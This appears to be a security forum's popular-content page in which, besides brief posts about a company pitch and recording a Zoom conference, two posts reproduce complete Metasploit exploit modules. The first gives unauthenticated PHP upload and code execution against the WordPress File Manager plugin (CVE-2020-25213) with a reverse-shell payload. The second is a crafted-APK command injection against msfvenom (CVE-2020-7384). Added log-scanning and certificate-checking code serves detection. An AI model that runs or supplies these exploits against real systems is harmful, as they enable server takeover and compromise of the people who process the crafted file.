
Leaderboard

Popular Content

Showing content with the highest reputation on 11/11/20 in all areas

  1. If you expect something more serious, be serious yourself. That is, give a bit of context about the company: whether it has a particular niche or not, its area of operation, who the main competitors are, what unique selling points you have, roughly what you would want to stick in the mind of someone who sees it - a single subliminal message (e.g. if I use these guys, they are the cheapest) and other relevant info.
    1 point
  2. I think you'd have better chances on TPU. Oh wait...
    1 point
  3. We're moving like a dead man's eyes
    1 point
  4. 1 point
  5. It will be recorded and I will publish the presentations afterwards (in the following days) on YouTube (probably). I will probably have to "cut" each presentation so that people can watch them properly, so I don't know if it will work directly in Zoom, since it wouldn't be elegant all lumped together like that.
    1 point
  6. @Nytro I think recording can be enabled on the webinar and saved either locally or directly on Zoom's server
    1 point
  7. I'd ask those who are able to "immortalize" the conference and upload it to a streaming platform; unfortunately I won't be able to attend
    1 point
  8. The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.

     ```ruby
     ##
     # This module requires Metasploit: https://metasploit.com/download
     # Current source: https://github.com/rapid7/metasploit-framework
     ##

     class MetasploitModule < Msf::Exploit::Remote
       Rank = NormalRanking

       include Msf::Exploit::Remote::HTTP::Wordpress
       prepend Msf::Exploit::Remote::AutoCheck
       include Msf::Exploit::FileDropper

       def initialize(info = {})
         super(
           update_info(
             info,
             'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',
             'Description' => %q{
               The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and
               execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php
               extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write
               PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.
             },
             'License' => MSF_LICENSE,
             'Author' =>
               [
                 'Alex Souza (w4fz5uck5)', # initial discovery and PoC
                 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module
               ],
             'References' =>
               [
                 [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],
                 [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],
                 [ 'CVE', '2020-25213' ]
               ],
             'Platform' => [ 'php' ],
             'Privileged' => false,
             'Arch' => ARCH_PHP,
             'Targets' =>
               [
                 [
                   'WordPress File Manager 6.0-6.8',
                   {
                     'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }
                   }
                 ]
               ],
             'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020
             'DefaultTarget' => 0
           )
         )

         register_options(
           [
             OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),
             OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])
           ]
         )
       end

       def check
         return CheckCode::Unknown unless wordpress_and_online?

         # check the plugin version from readme
         check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')
       end

       def exploit
         # base path to File Manager plugin
         file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')
         # filename of the file to be uploaded/created
         filename = "#{Rex::Text.rand_text_alphanumeric(6)}.php"
         register_file_for_cleanup(filename)

         case datastore['COMMAND']
         when 'upload'
           elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)
         when 'mkfile+put'
           elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)
           elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)
         end

         payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)
         print_status("#{peer} - Payload is at #{payload_uri}")
         # execute the payload
         send_request_cgi('uri' => normalize_uri(payload_uri))
       end

       # make it easier to switch between "upload" and "mkfile+put" exploit methods
       def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})
         filename = opts['filename']

         # prep for exploit
         post_data = Rex::MIME::Message.new
         post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name="cmd"')

         case elfinder_cmd
         when 'upload'
           post_data.add_part('l1_', nil, nil, 'form-data; name="target"')
           post_data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"upload[]\"; filename=\"#{filename}\"")
         when 'mkfile'
           post_data.add_part('l1_', nil, nil, 'form-data; name="target"')
           post_data.add_part(filename, nil, nil, 'form-data; name="name"')
         when 'put'
           post_data.add_part("l1_#{Rex::Text.encode_base64(filename)}", nil, nil, 'form-data; name="target"')
           post_data.add_part(payload.encoded, nil, nil, 'form-data; name="content"')
         end

         res = send_request_cgi(
           'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),
           'method' => 'POST',
           'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
           'data' => post_data.to_s
         )

         fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res
         fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") unless res.code == 200
       end
     end
     ```

     Source
    1 point
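
A detection sketch for the request pattern in the post above, added here as an example and not part of the original post or of Metasploit: it flags access-log lines that POST to the plugin's `connector.minimal.php` or request a script under `lib/files/`. The "combined" log format, the extra script extensions and every sample line are constructed assumptions.

```ruby
require 'uri'

# Added example (not from the original post): flag access-log lines matching
# the requests described for CVE-2020-25213. Log format and SAMPLE_LOG are
# constructed; .phtml/.phar are an assumption beyond the page's ".php".
PLUGIN    = '/wp-content/plugins/wp-file-manager'
CONNECTOR = %r{#{PLUGIN}/lib/php/connector\.minimal\.php\z}i
DROPPED   = %r{#{PLUGIN}/lib/files/[^/]+\.(?:php\d?|phtml|phar)\z}i
LINE      = /\A(?<ip>\S+) \S+ \S+ \[[^\]]+\] "(?<verb>[A-Z]+) (?<target>\S+)[^"]*" (?<status>\d{3}) /

SAMPLE_LOG = <<~LOG
  198.51.100.4 - - [11/Nov/2020:09:58:41 +0000] "GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
  203.0.113.7 - - [11/Nov/2020:10:01:02 +0000] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 200 412 "-" "Mozilla/5.0"
  203.0.113.7 - - [11/Nov/2020:10:01:03 +0000] "GET /wp-content/plugins/wp-file-manager/lib/files/aB3dE9.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
  192.0.2.55 - - [11/Nov/2020:10:07:19 +0000] "POST /wp-content//plugins/wp-file-manager/lib/php/connector%2Eminimal.php?x=1 HTTP/1.1" 404 162 "-" "Mozilla/5.0"
  198.51.100.4 - - [11/Nov/2020:10:09:00 +0000] "GET /wp-content/plugins/wp-file-manager/lib/files/report.pdf HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
LOG

# Drop the query string, percent-decode and collapse "//" so that trivially
# obfuscated request targets still match the two patterns above.
def normalize(target)
  path = target.split('?', 2).first.to_s
  path = URI.decode_www_form_component(path) rescue path
  path.squeeze('/')
end

def scan(log)
  log.each_line.filter_map do |line|
    m = LINE.match(line) or next
    path = normalize(m[:target])
    rule = if m[:verb] == 'POST' && path.match?(CONNECTOR) then :connector_post
           elsif path.match?(DROPPED) then :php_under_lib_files
           end
    { ip: m[:ip], rule: rule, path: path, status: m[:status].to_i } if rule
  end
end

# Clients that got a 200 from the connector and later requested a script in
# lib/files/: the write-then-request sequence the module performs.
def upload_then_execute(findings)
  findings.group_by { |f| f[:ip] }.select do |_ip, fs|
    post = fs.index { |f| f[:rule] == :connector_post && f[:status] == 200 }
    post && fs[post..].any? { |f| f[:rule] == :php_under_lib_files }
  end.keys
end
```

Any hit from `scan` on a site that still runs versions 6.0 through 6.8 warrants a review of the files present in `lib/files/`; `upload_then_execute` narrows the list to clients that completed both steps.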
  9. This Metasploit module exploits a command injection vulnerability in Metasploit Framework's msfvenom payload generator when using a crafted APK file as an Android payload template. Affected versions include Metasploit Framework 6.0.11 and below and Metasploit Pro 4.18.0 and below.

     ```ruby
     ##
     # This module requires Metasploit: https://metasploit.com/download
     # Current source: https://github.com/rapid7/metasploit-framework
     ##

     require 'rex/zip/jar'

     class MetasploitModule < Msf::Exploit::Remote
       Rank = ExcellentRanking

       include Msf::Exploit::FILEFORMAT

       def initialize(info = {})
         super(
           update_info(
             info,
             'Name' => 'Rapid7 Metasploit Framework msfvenom APK Template Command Injection',
             'Description' => %q{
               This module exploits a command injection vulnerability in Metasploit Framework's msfvenom
               payload generator when using a crafted APK file as an Android payload template.
               Affects Metasploit Framework <= 6.0.11 and Metasploit Pro <= 4.18.0. The file produced by
               this module is a relatively empty yet valid-enough APK file. To trigger the vulnerability,
               the victim user should do the following:

               msfvenom -p android/<...> -x <crafted_file.apk>
             },
             'License' => MSF_LICENSE,
             'Author' => [
               'Justin Steven' # @justinsteven
             ],
             'References' => [
               ['URL', 'https://github.com/justinsteven/advisories/blob/master/2020_metasploit_msfvenom_apk_template_cmdi.md'],
               ['CVE', '2020-7384'],
             ],
             'DefaultOptions' => {
               'DisablePayloadHandler' => true
             },
             'Arch' => ARCH_CMD,
             'Platform' => 'unix',
             'Payload' => {
               'BadChars' => "\x22\x2c\x5c\x0a\x0d"
             },
             'Targets' => [[ 'Automatic', {}]],
             'Privileged' => false,
             'DisclosureDate' => '2020-10-29'
           )
         )

         register_options([
           OptString.new('FILENAME', [true, 'The APK file name', 'msf.apk'])
         ])
       end

       def build_x509_name
         name = "CN=';(#{payload.encoded}) >&- 2>&- & #"
         OpenSSL::X509::Name.parse(name)
       end

       def generate_signing_material
         key = OpenSSL::PKey::RSA.new(2048)
         cert = OpenSSL::X509::Certificate.new
         cert.version = 2
         cert.serial = 1
         cert.subject = cert.issuer = build_x509_name
         cert.public_key = key.public_key
         cert.not_before = Time.now
         # FIXME: this will break in the year 2037 on 32-bit systems
         cert.not_after = cert.not_before + 1.year

         # Self-sign the certificate, otherwise the victim's keytool gets unhappy
         cert.sign(key, OpenSSL::Digest::SHA256.new)

         [cert, key]
       end

       def exploit
         print_warning('Warning: bash payloads are unlikely to work') if datastore['PAYLOAD'].include?('bash')

         apk = Rex::Zip::Jar.new
         apk.build_manifest
         cert, key = generate_signing_material
         apk.sign(key, cert)
         data = apk.pack
         file_create(data)
       end
     end
     ```

     Source
    1 point
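
The module in the post above carries its command in the signing certificate's CN, so a template APK's signer certificate can be screened before any tool processes it. The following is an added example, not Metasploit code and not from the original post: it reads a JAR-style PKCS#7 signature block (the `META-INF/*.RSA` entry, assumed here to be already extracted from the APK) and lists DN attributes containing characters outside an allowlist. The allowlist, the helper names and both sample certificates are constructed assumptions.

```ruby
require 'openssl'

# Added example (not Metasploit code): list subject/issuer attributes of the
# certificates in a PKCS#7 signature block whose values contain characters
# outside a conservative allowlist. The allowlist is an assumption; anything
# else (quotes, ';', '(', '&', '#', non-ASCII bytes) is reported.
UNSAFE = /[^A-Za-z0-9 .,_@-]/

# Constructed sample input: a self-signed certificate with the given CN,
# wrapped in a detached PKCS#7 signature, as JAR signing stores it.
def constructed_sig_block(cn)
  key = OpenSSL::PKey::RSA.new(2048)
  cert = OpenSSL::X509::Certificate.new
  cert.version = 2
  cert.serial = 1
  cert.subject = cert.issuer = OpenSSL::X509::Name.new([['CN', cn]])
  cert.public_key = key.public_key
  cert.not_before = Time.now
  cert.not_after = cert.not_before + 3600
  cert.sign(key, OpenSSL::Digest.new('SHA256'))
  OpenSSL::PKCS7.sign(cert, key, 'constructed', [], OpenSSL::PKCS7::DETACHED).to_der
end

# Returns one entry per offending attribute; an empty array means every DN
# value in the block passed the allowlist.
def unsafe_dn_attrs(sig_block_der)
  certs = OpenSSL::PKCS7.new(sig_block_der).certificates || []
  certs.flat_map do |cert|
    { subject: cert.subject, issuer: cert.issuer }.flat_map do |role, name|
      name.to_a.filter_map do |attr, value, _type|
        bad = value.scan(UNSAFE).uniq
        { role: role, attr: attr, chars: bad } unless bad.empty?
      end
    end
  end
end
```

A non-empty result is a reason to reject the file as a template; the check complements, and does not replace, running a release newer than the affected versions named in the post.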